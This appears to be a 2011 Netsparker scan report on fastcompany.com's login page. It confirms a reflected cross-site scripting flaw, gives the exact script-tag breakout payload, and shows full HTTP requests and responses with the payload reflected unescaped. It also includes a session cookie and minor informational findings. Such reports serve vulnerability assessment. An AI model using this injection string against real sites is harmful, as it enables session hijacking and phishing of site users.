Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Netsparker - Scan Report Summary
TARGET URL
http://www.fastcompany.com/login
SCAN DATE
3/6/2011 1:46:18 PM
REPORT DATE
3/6/2011 7:03:48 PM
SCAN DURATION
00:00:42

Total Requests

Average Speed

req/sec.
4 identified, 1 confirmed, 0 critical, 2 informational

GHDB, DORK Tests

PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

IMPORTANT 25 %, LOW 25 %, INFORMATION 50 %
Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include OWASP Reform and the Microsoft Anti Cross-site Scripting libraries.

- /login

/login CONFIRMED

http://www.fastcompany.com/login?'"--></style></script><script>alert(0x000012)</script>

Parameters

Parameter      Type           Value
Query Based    QUERYSTRING    '"--></style></script><script>alert(0x000012)</script>

Request

GET /login?'"--></style></script><script>netsparker(0x000012)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:46:12 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:06:13 GMT
Last-Modified: Sun, 06 Mar 2011 19:46:12 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440772-1"
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 6449
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- ChartBeat --> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <title>Login or Sign Up | Fast Company</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><!--Visual Revenue Reader Response Tracking Script (v5) --><script type="text/javascript">var _vrid = 25;var _vrtrack = function(){};(function(d, a) { var s = d.createElement(a), x = d.getElementsByTagName(a)[0]; s.async = true; s.src = 'http://a.visualrevenue.com/vr.js'; x.parentNode.insertBefore(s, x);})(document, 'script');</script><!-- End of VR RR Tracking Script - All rights reserved --><meta name="DC.Title" content="Fast Company | Where Ideas and People Meet" /><meta name="robots" content="index,follow" /><link rel="shortcut icon" href="http://vox.fastcompany.com/files/fc_v1_favicon.ico" type="image/x-icon" /><link type="text/css" rel="stylesheet" media="all" href="/files/css/37ef444150d1622ad295d8e4c7546866.css" /><link type="text/css" rel="stylesheet" media="print" href="/files/css/b97c9c919d1fe905df2c76cdeee021c3.css" /> <script type="text/javascript" src="/files/js/4615cc22a03b22b826f5edd501349778.js"></script> <!--[if lt IE 7]> <style type="text/css" media="all">@import "/sites/all/themes/fc_v1/stylesheets/fix-ie.css";</style> <![endif]--> <!--[if IE]> <style> #dsq-content iframe { border: 1px solid #666 !important; } </style> <![endif]--> <link rel="canonical" href="/login?'"--></style></script><script>netsparker(0x000012)</script>" /> </head> <body class="sidebar-right no-border"> <div id="block-fc_ads-fc_ads_pixel" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" 
src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="1" height="1" border="0" alt=""/></a></noscript></div> </div><div id="interstitial_ad"></div> <!-- SiteCatalyst code version: H.14.Copyright 1997-2007 Omniture, Inc. More info available athttp://www.omniture.com --><script language="JavaScript" src="/sites/all/themes/fc_v1/s_code.js"></script><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
s.prop11 = ''
s.prop1 = ''
s.prop6 = ''
s.prop13 = ''
s.prop9 = ''
s.prop38= ""
s.pageName = 'login:'
s.prop5 = 'login'
s.channel = 'mansueto.fc/ros'
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--></script> <script language='JavaScript'><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><!--/DO NOT REMOVE/--> <!-- End SiteCatalyst code version: H.14. --><div id="usertoolbar"><div id="usertoolbar_inner1"><div id="usertoolbar_inner2"> <div id="usertoolbar_rss"><noscript>Using a mobile device? Go to <a href="http://m.fastcompany.com">m.fastcompany.com</a> for our mobile version.</noscript> <a href="/rss.xml">RSS</a></div> <div id="usertoolbar_rsslogo"><a href="/rss.xml"><img src="/sites/all/themes/fc_v1/images/icon_rss.gif" alt="FastCompany RSS Feed"></a></div> <!--<div id="usertoolbar_newsletters"><a href="/my/newsletters">Newsletters</a></div>//--> <div id="toolbar_blocks"> <div id="block-fc_profiles-0" class="clear-block block block-fc_profiles"> <div class="content"><div id='login_link'><a href='/login' class='modalInputSignup' rel='#login_form_overlay'>Login or Signup</a></div></div> </div></div> <script language="Javascript">//writeName();</script> <br clear="all"></div></div></div><!-- Layout --><div id="sitewrapper"><div class="header"> <!-- START: new Header --> <div class="header-inner"> <div class="header-row-one"> <div class="header-row-one-inner"> <div class="site-logo"> <div class="site-logo-inner"> <a href="/"><img src="/files/fc_v1_logo2.gif" width="251px" height="68px" alt="Fast Company Logo" title="Fast Company Logo" /> </a> </div> </div> <div class="banner-advt"> <div class="banner-advt-inner"> <div id="block-fc_ads-fc_ads_leaderboard" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" 
src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="728" height="90" border="0" alt=""/></a></noscript></div> </div> </div> </div> </div> </div> <div class="header-row-two"> <div class="header-row-two-inner"> <ul class="links primary-links"><li class="first menu-1-1-2"><a href="/topics/technology" class="menu-1-1-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Technology"></a></li> <li class="menu-1-2-2"><a href="http://www.fastcodesign.com" title="Design" class="menu-1-2-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Designs"></a></li> <li class="menu-1-3-2"><a href="/topics/ethonomics" title="Ethonomics" class="menu-1-3-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Ethonomics"></a></li> <li class="last menu-1-4-2"><a href="/topics/leadership" title="Leadership" class="menu-1-4-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Leadership"></a></li> </ul> <div class="extralinks"> <a href="/magazine" title="Magazine" class="extra-leadership"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Magazine"></a> <a href="http://trax.fastcompany.com/k/w/sub/box-text" title="Subscribe" class="extra-community"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Community"></a> <a href="http://jobs.fastcompany.com/?partner=fcmasthead" title="Jobs" class="extra-jobs"><img src="/sites/all/themes/fc_v1/images/spacer.gif" 
alt="Jobs"></a> </div> <div class="header-search"> <div class="header-search-inner"> <div id="block-fc_helper-fc_search" class="clear-block block block-fc_helper"> <h2><span><none></span></h2> <div class="content"><form action="/search/google" accept-charset="UTF-8" method="get" id="fc-helper-search-form"><div><div class="form-item" id="edit-search-wrapper"> <input type="text" maxlength="128" name="search" id="edit-search" size="60" value="" class="form-text" /></div><input type="hidden" name="cx" id="edit-cx" value="partner-pub-9871731465474413:6yw1dauulom" /><input type="hidden" name="cof" id="edit-cof" value="FORID:11" /><input type="submit" name="sa" id="edit-submit" value="Search" class="form-submit google-search-submit" /><input type="hidden" name="form_id" id="edit-fc-helper-search-form" value="fc_helper_search_form" /></div></form></div> </div> </div> </div> </div> </div> </div></div><!--END: new Header --> <img id="print-logo" src="/sites/all/themes/fc_v1/images/logo.gif" /> <div id="content"> <div id="center"> <div id="left_forms"><form action="/login?destination=login%3F%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%25280x000012%2529%253C%2Fscript%253E%3D" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top"><div><div class="login_headline_text">Member Login</div><div class="form-item" id="edit-name-wrapper"> <input type="text" maxlength="60" name="name" id="edit-name" size="20" value="Email" class="form-text required" /></div><div class="form-item" id="edit-pass-wrapper"> <input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" /></div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><div class="item-list"><ul><li><a href="/" title="Request new password via e-mail." 
id="forgotten_pass" onclick="return false;">forgot your password?</a></li></ul></div><div id="catch_err"></div><div class="login_headline_text" id="forgot_pass"></div><input type="hidden" name="form_id" id="edit--profileLoginForm" value="_profileLoginForm" /></div></form><br /><form action="/login?&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000012)&lt;/script&gt;" accept-charset="UTF-8" method="post" id="user-pass"><div><div class="form-item" id="edit-name-wrapper"> <label for="edit-name">Username or e-mail address: <span class="form-required" title="This field is required.">*</span></label> <input type="text" maxlength="64" name="name" id="edit-name" size="60" value="" class="form-text required" /></div><input type="hidden" name="form_id" id="edit-user-pass" value="user_pass" /><input type="submit" name="op" id="edit-submit" value="E-mail new password" class="form-submit" /></div></form></div><form action="/login?&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000012)&lt;/script&gt;" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top"><div><div class="login_headline_text">Sign Up<span class="login_required_fields"><span style="color:red;">*</span>Required Field</span></div><div class="form-item" id="edit-regFullName-wrapper"> <input type="text" maxlength="60" name="regFullName" id="edit-regFullName" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regEmail-wrapper"> <input type="text" maxlength="64" name="regEmail" id="edit-regEmail" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regPassClear-wrapper"> <input type="text" maxlength="60" name="regPassClear" id="edit-regPassClear" size="15" value="" class="form-text" /></div><div class="form-item" id="edit-regPass-wrapper"> <input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" /></div><div 
class="signup_blurb">Registering for Fast Company is easy, just fill in the blanks above and submit a comment. Once your account is approved, update your profile page and start a discussion. Your email will not be shared with the public, or any third-party advertisers.</div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><input type="hidden" name="form_id" id="edit--profileSignUpForm" value="_profileSignUpForm" /></div></form> </div><!--// ENDS CENTER --> <div id="sidebar-two"> <div class="block-wrap row1"> <div id="block-fc_blocks-rs_block_sitewide_1" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734356"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted">Welcome to the TED Revival: Blind People Drive, Paralyzed People Walk</a> </div> </div> <div class="rs_it_image"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted"><img src="http://www.fastcompany.com/files/imagecache/rs_145_image/files/thumb-blind-driver-challenge-ted.jpg" alt="" title="" /></a> </div> </div></div> </div> <div id="block-fc_ads-fc_ads_imu1" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" 
target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="336" height="280" border="0" alt=""/></a></noscript><p class="advertisement">ADVERTISEMENT</p></div> </div> <div id="block-fc_blocks-rs_block_sitewide_2" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734461"> <a href="/1734461/jimmy-wales-wikipedia-google-content-farms-matt-cutts-demand-media">Hey Jimmy Wales, What Do You Think of Content Farms?</a> </div> </div> <div ..
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /login

/login

http://www.fastcompany.com/login

Extracted Version

PHP/5.2.4

Request

HEAD /login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 06 Mar 2011 20:05:20 GMT
Etag: "1299440720-1"
Last-Modified: Sun, 06 Mar 2011 19:45:20 GMT
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST


Crossdomain.xml Identified

1 TOTAL
INFORMATION
Netsparker identified a Crossdomain.xml file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information; there is no direct impact resulting from this issue.
- /crossdomain.xml

/crossdomain.xml

http://www.fastcompany.com/crossdomain.xml

Policy Rules

  • www.fastcompany.com
  • *.www.fastcompany.com

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:43 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:05:44 GMT
Last-Modified: Sun, 06 Mar 2011 19:45:44 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440744"
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 169
Content-Type: text/xml
X-Cache: MISS from VoxCAST


<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.fastcompany.com" /> <allow-access-from domain="*.www.fastcompany.com" /></cross-domain-policy>
Sitemap Identified

1 TOTAL
INFORMATION
Netsparker identified a Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information; there is no direct impact resulting from this.
- /sitemap.xml

/sitemap.xml

http://www.fastcompany.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
Last-Modified: Thu, 03 Mar 2011 23:51:24 GMT
ETag: "c39624-f66-b5005700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
X-Served-By: daa-www011
Content-Length: 332
X-Cache: HIT from VoxCAST
Age: 1
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/siteindex.xsd"> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap0.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap1.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap2.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap3.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap4.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap5.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap6.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap7.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap8.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap9.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap10.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap11.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap12.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap13.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap14.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap15.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap16.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap17.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap18.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap19.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap20.xml</loc> </sitemap> 
<sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap21.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap22.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap23.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap24.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap25.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap26.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap27.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap28.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap29.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap30.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap31.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap32.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap33.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap34.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap35.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap36.xml</loc> </sitemap> <sitemap> <loc>http://www.fastcompany.com/sitemaps/sitemap37.xml</loc> </sitemap></sitemapindex>